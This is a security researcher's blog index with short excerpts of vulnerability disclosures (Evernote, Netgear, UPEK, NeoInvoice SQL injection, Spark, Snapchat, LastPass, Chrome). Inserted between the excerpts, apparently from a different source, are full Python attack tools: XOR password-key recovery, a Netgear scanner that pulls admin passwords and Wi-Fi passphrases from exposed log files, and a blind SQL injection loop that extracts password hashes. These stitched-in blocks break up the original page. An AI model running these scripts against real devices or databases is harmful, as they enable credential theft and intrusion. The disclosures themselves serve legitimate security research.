Evernote: XOR & Passwords
Update: Evernote has reported that this issue has been addressed.
Evernote for Android stores various settings in an XML file. That file isn’t really protected: it’s easily readable, especially if an attacker is able to get physical access to the device. What’s worse is that it contains the user’s credentials.
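As an added illustration (this is not code from the post, and not Evernote’s actual scheme, whose key and encoding the excerpt does not give), the following Python reads the two elements out of a preferences file of the shape named below and shows why XOR against a static key is not encryption: one account whose password you already know hands you the key, and the key decodes every other account. The key value, the hex encoding and all sample credentials are assumptions constructed for the example.

```python
import xml.etree.ElementTree as ET

# ASSUMPTIONS for illustration only: a static key baked into the app and a hex
# encoding of the XOR output. The real app's key and encoding are not given here.
ASSUMED_KEY = b"examplekey"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. XOR is its own inverse, so the same
    call both 'encrypts' and 'decrypts'."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_prefs_xml(username: str, password: str, key: bytes = ASSUMED_KEY) -> str:
    """Constructed sample of a shared_prefs file, storing the password the way a
    static-XOR scheme would, under the element names the post reports."""
    enc = xor_bytes(password.encode(), key).hex()
    return (
        '<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n'
        "<map>\n"
        f'    <string name="username">{username}</string>\n'
        f'    <string name="encrypted_password">{enc}</string>\n'
        "</map>\n"
    )


def read_credentials(xml_text: str) -> dict:
    """Pull the username and encrypted_password <string> elements out of the file."""
    root = ET.fromstring(xml_text)
    return {el.get("name"): (el.text or "")
            for el in root.findall("string")
            if el.get("name") in ("username", "encrypted_password")}


def decode_password(encrypted_hex: str, key: bytes) -> str:
    """Anyone holding the static key reverses the 'encryption' in one call."""
    return xor_bytes(bytes.fromhex(encrypted_hex), key).decode()


def recover_key(encrypted_hex: str, known_plaintext: str) -> bytes:
    """Known-plaintext attack on a static XOR key: ciphertext XOR plaintext is the
    key stream. The stream repeats with the key's period, so if the known
    password is at least as long as the key, the whole key comes out; a shorter
    known password only yields a prefix of it."""
    pt = known_plaintext.encode()
    stream = xor_bytes(bytes.fromhex(encrypted_hex)[: len(pt)], pt)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - period] for i in range(period, len(stream))):
            return stream[:period]
    return stream


def demo() -> dict:
    """Attacker extracts the key from their own prefs file, then reads a victim's."""
    mine = read_credentials(build_prefs_xml("attacker", "my-own-pass-14"))
    key = recover_key(mine["encrypted_password"], "my-own-pass-14")
    victim = read_credentials(build_prefs_xml("victim", "s3cret-passphrase"))
    return {"key": key, "username": victim["username"],
            "password": decode_password(victim["encrypted_password"], key)}


if __name__ == "__main__":
    print(demo())
```

The point of recover_key is that the attacker never needs to pull the key out of the APK at all: with one device (or account) they control, the stored value and the password they typed are enough.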
/data/data/com.evernote/shared_prefs/com.evernote_preferences.xml

The username is located in the <string name="username"> element, and the password is stored in <string name="encrypted_password"> – from the name you’d assume that the password is actually encrypted. You’d be wrong.
Read more…
Revisiting Snapchat API & Security
As Snapchat has increased in popularity, I’ve been asked several times to revisit my Snapchat API & Security post, to address the changes that they made in response to my complaints. So, here it is – sorta.
I started making detailed notes and looking at the changes they made – but yesterday @tlack made that mostly irrelevant with his release of Snaphax, a PHP library to interact with the undocumented Snapchat API. So for now, if you want to know more about their API, or if you just want to save images or video, I’d suggest taking a good look at the Snaphax code. What I will do, though, is talk about some of their changes and what they did right and what they did wrong.
Read more…
Netgear Admin Password Disclosure
Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named /cgi-bin/<model>.log – if the device is vulnerable, you’ll get something like this:

> curl http://<ip>/cgi-bin/WNR2000XT.log
Admin login name              admin
Admin password                <snip>
Country                       Europe
Wireless network name (SSID)  wireless_ext
Wireless channel              6
Security type                 WPA2-PSK(AES)
Wireless passphrase           <snip>

The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received. To help identify the vulnerable devices, I pulled a list of all Netgear devices and wrote this script:
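The author’s own script is in the full post. As an added example, not the author’s script and not Netgear code, here is one way to check a device: build the /cgi-bin/<model>.log URL for each model name you care about, fetch it, and parse the label/value lines into fields so a disclosed admin password can be flagged. The model list, the host and the sample log body are constructed for the example; the only model name taken from the page is WNR2000XT.

```python
import urllib.request
from urllib.error import URLError

# Labels as they appear in the log output above; each line is "<label> <value>".
FIELDS = (
    "Wireless network name (SSID)",
    "Wireless passphrase",
    "Wireless channel",
    "Admin login name",
    "Admin password",
    "Security type",
    "Country",
)

# Constructed sample of a log body; the values are made up.
SAMPLE_LOG = """\
Admin login name              admin
Admin password                hunter2
Country                       Europe
Wireless network name (SSID)  wireless_ext
Wireless channel              6
Security type                 WPA2-PSK(AES)
Wireless passphrase           correct-horse
"""


def parse_netgear_log(text: str) -> dict:
    """Turn the <model>.log body into a label -> value dict, ignoring other lines."""
    found = {}
    for raw in text.splitlines():
        line = raw.strip()
        for label in FIELDS:
            if line.startswith(label):
                found[label] = line[len(label):].strip()
                break
    return found


def discloses_admin_password(fields: dict) -> bool:
    """True when the log hands out a non-empty administrator password."""
    return bool(fields.get("Admin password"))


def log_url(host: str, model: str) -> str:
    return f"http://{host}/cgi-bin/{model}.log"


def fetch_log(host: str, model: str, timeout: float = 5.0):
    """Request the log; None if the path is absent (404), unreachable or malformed."""
    try:
        with urllib.request.urlopen(log_url(host, model), timeout=timeout) as resp:
            if resp.getcode() != 200:
                return None
            return resp.read().decode("utf-8", "replace")
    except (URLError, OSError, ValueError):
        return None


def check_device(host: str, models) -> dict:
    """Try each model name against one host; return the first disclosing log's
    fields (plus the model that worked), or an empty dict."""
    for model in models:
        body = fetch_log(host, model)
        if body:
            fields = parse_netgear_log(body)
            if discloses_admin_password(fields):
                return {"model": model, **fields}
    return {}


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; a live run would be
    # check_device("192.0.2.1", ["WNR2000XT", ...]) against a device you own.
    print(parse_netgear_log(SAMPLE_LOG))
```

Only test this against hardware you are authorised to assess; a hit means the admin password and Wi-Fi passphrase are readable by anyone who can reach the web interface.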
Read more…
UPEK Windows Password Decryption
On August 28th ElcomSoft announced that they had determined a method to extract Windows passwords from the registry for users of UPEK’s fingerprint readers and Protector Suite software (UPEK is now owned by AuthenTec, which is now owned by Apple). What they didn’t announce was the technical details of how they did it. Brandon Wilson and I have been working to recreate their research – and we have.
We have not been in contact with ElcomSoft, so this is an independent re-discovery of this vulnerability. ElcomSoft has committed to not release details, which I understand – but given how likely it is that others will determine this technique, I believe that this information should be available to pen-testers and auditors so that these insecure credentials can be identified.
Read more…
NeoInvoice Blind SQL Injection (CVE-2012-3477)
NeoInvoice is a multi-tenant open source invoicing system that currently contains an unauthenticated blind SQL injection condition in signup_check.php. The input for the value field isn’t properly sanitized, and is concatenated straight into the SQL query:

require_once("config.php");

if (isset($_GET['field']) && ($_GET['field'] == 'username' || $_GET['field'] == 'email')) {
    $field = $_GET['field'];
    $table = 'user';
    $taken = '0';
    $not_taken = '1';
} else if (isset($_GET['field']) && $_GET['field'] == 'coupon') {
    $field = 'name';
    $table = 'coupon';
    $taken = '1';
    $not_taken = '0';
} else {
    die("<div class=\"error\">Invalid Field</div>");
}

if (!isset($_GET['value'])) {
    die("<div class=\"error\">Invalid Value</div>");
}

$value = preg_replace("[^a-zA-Z0-9_.\-\*\/\+\, @]", "", $_GET['value']);
if ($value != $_GET['value']) {
    die("<div class=\"error\">Invalid Value</div>");
}

$connect = mysql_connect(MYSQL_HOSTNAME, MYSQL_USERNAME, MYSQL_PASSWORD);
if (!$connect) {
    die("<div class=\"error\">" . mysql_error() . "</div>");
}

$query = "SELECT $field FROM $table WHERE $field = '$value' LIMIT 1";
mysql_select_db(MYSQL_DATABASE, $connect);
$result = mysql_query($query, $connect);

if (mysql_num_rows($result)) {
    echo $taken;
} else {
    echo $not_taken;
}

The line that builds $query is the key: by concatenating untrusted data into the SQL query, it makes SQL injection trivial. The preg_replace() above it doesn’t save the day either: the pattern has no enclosing delimiters, so PHP takes the square brackets themselves as the delimiters and what is left is a literal sequence anchored at the start of the input, which ordinary input never matches. $value therefore comes back equal to $_GET['value'], quotes included, and the check passes. The field name is whitelisted, so the response is only a taken/not-taken flag, which is what makes the injection blind. This vulnerability can be demonstrated with the following request:
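The author’s demonstration request is in the full post. As an added example, not the project’s code and not the author’s request, the following Python reproduces the query construction from signup_check.php against an in-memory SQLite table and then drives the taken/not-taken answer as a boolean oracle to read a password hash one character at a time, which is exactly what a blind injection buys an attacker. The table contents are constructed sample data; the parameterized version beside the vulnerable one shows the fix. SQLite’s substr() is used in the payload and exists in MySQL as well.

```python
import sqlite3

HEX = "0123456789abcdef"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the 'user' table; the rows are made-up sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "5f4dcc3b"),
         ("bob", "bob@example.com", "e99a18c4")],
    )
    conn.commit()
    return conn


def signup_check_vulnerable(conn, field: str, value: str) -> str:
    """Mirror of the post's signup_check.php for the user table: the field is
    whitelisted, but value is concatenated into the SQL. Returns '0' (taken)
    or '1' (not taken), as the PHP does for username/email."""
    if field not in ("username", "email"):
        raise ValueError("Invalid Field")
    query = f"SELECT {field} FROM user WHERE {field} = '{value}' LIMIT 1"
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.Error:
        # PHP's mysql_num_rows(false) is falsy, so a broken query reads as "not taken".
        return "1"
    return "0" if rows else "1"


def signup_check_fixed(conn, field: str, value: str) -> str:
    """Same logic with the value bound as a parameter; the whitelist still
    protects the identifier, which cannot be parameterized."""
    if field not in ("username", "email"):
        raise ValueError("Invalid Field")
    rows = conn.execute(
        f"SELECT {field} FROM user WHERE {field} = ? LIMIT 1", (value,)
    ).fetchall()
    return "0" if rows else "1"


def blind_extract(check, length: int, alphabet: str = HEX) -> str:
    """Use the taken/not-taken reply as a boolean oracle to read the first user's
    password one position at a time. Stops early when no character matches,
    which is also what happens once the injection is closed."""
    out = ""
    for pos in range(1, length + 1):
        for c in alphabet:
            # Closes the opening quote, ORs in the probe, and leaves the trailing
            # quote of the original query to close the probe's literal.
            payload = f"x' OR substr((SELECT password FROM user LIMIT 1),{pos},1)='{c}"
            if check("username", payload) == "0":
                out += c
                break
        else:
            break
    return out


if __name__ == "__main__":
    db = make_db()
    print(blind_extract(lambda f, v: signup_check_vulnerable(db, f, v), 8))
    print(blind_extract(lambda f, v: signup_check_fixed(db, f, v), 8))
```

Each recovered character costs at most sixteen requests here; against the real endpoint the same loop runs over HTTP, reading '0' or '1' from the response body.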
Read more…
Decrypting Spark Saved Passwords
A friend of mine has been evaluating an open source instant messaging client called Spark, which can be linked to Active Directory for authentication. Like most IM clients, Spark allows users to save their password – and me being me, I was curious as to how it’s doing this – as storing Windows domain logins is kinda a big deal.
So, within a few minutes I found all of the details – and none of them make me feel any better. Here are the important bits:
Read more…
Snapchat: API & Security
Update 3: In 2014 the FTC filed a complaint against Snapchat for their failure to provide the level of security they promised. The findings listed below were sent to the founders of Snapchat; that email was quoted in the FTC complaint as proof that Snapchat was aware of these issues.
Update 2: The Snapchat API has changed to address the issues I pointed out to them – and the new API has issues as well. I’ve posted an update that covers some of these changes.
Read more…
Slipping Past LastPass
Update: LastPass has confirmed that they’ll address this issue in the next release.
Update 2: LastPass has addressed this issue in their new v2.0 release. There is still a way to bypass the password prompt in Chrome, but they will address that in the next release. Overall, it looks like we can close the books on this one.
I’m a big fan of LastPass – it’s a great service that has impressed me every step of the way. Though it’s not perfect, and I’ve found a small hole that makes it easier for an attacker to get your passwords – if the following are true:
Read more…
Poking Mykonos
While checking on the latest updates in the start-up world from TechCrunch, I came across their article on Mykonos; the important part of their article (at least for me), is this:
Mykonos’s Web Security product uses deception to “detect, confuse, slow down and prevent attackers” in real-time in order to help companies protect their websites and Web apps from malicious hackers and proactively prevent fraud and theft.
A couple of minutes of reading, and my interest was piqued – to say the least. The thing that most interested me was the claim of no false positives, while they do talk about it – I really wanted to see it for myself. Assuming they used their own product to protect their site, I took a few minutes to see what I could find – and find I did.
Read more…
Google Chrome Leaking Credit Card Data?
While testing ccsrch I noticed a number that looked familiar – my debit card number. Now, being just a little paranoid, I don’t leave such information on my system unencrypted – so seeing it was a real surprise. But, here’s the real kicker: it was on my work PC, where it never should have been. But there it was, plain as day, in clear text. I spent a couple of minutes staring at the log trying to figure out why it would be there.
Read more…